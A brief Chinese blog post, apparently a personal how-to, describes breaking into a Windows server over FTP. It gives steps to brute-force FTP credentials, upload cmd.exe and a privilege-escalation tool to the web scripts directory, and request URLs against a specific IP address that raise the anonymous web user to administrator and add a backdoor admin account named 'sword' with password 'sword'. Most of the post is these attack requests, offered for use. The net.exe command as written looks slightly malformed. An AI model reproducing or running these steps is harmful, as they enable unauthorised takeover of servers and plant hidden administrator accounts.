ftp入侵

主要是ftp暴力爆破
用脚本:原理就是ftp ip就会让你输入id和password
cd /script,将自己的cmd.exe和getadmin.exe(一个提升权限的工具)复制到对方的scripts目录
在浏览器中输入http://192.188.0.183/scripts/getadmin.exe?iusr_phoenix-r(1)
如果返回CGI Error
就已经成功地将IUSR——phoenix-r 提升为了管理员
然后添加用户:
http://192.188.0.183/scripts/cmd.exe?/c c://winnt//system32//net.exe sword sword /add
添加了一个叫sword的密码也为sword用户
http://192.188.0.183/scripts/getadmin.exe?sword(同1)
并提升权限为了管理员
这样就成功地入侵了
以上的前提是一些粗心的管理员没有禁止guest用户,而且匿名权限为”写入“

posted @ 2025-04-15 14:32  小yangzz  阅读(20)  评论(0)    收藏  举报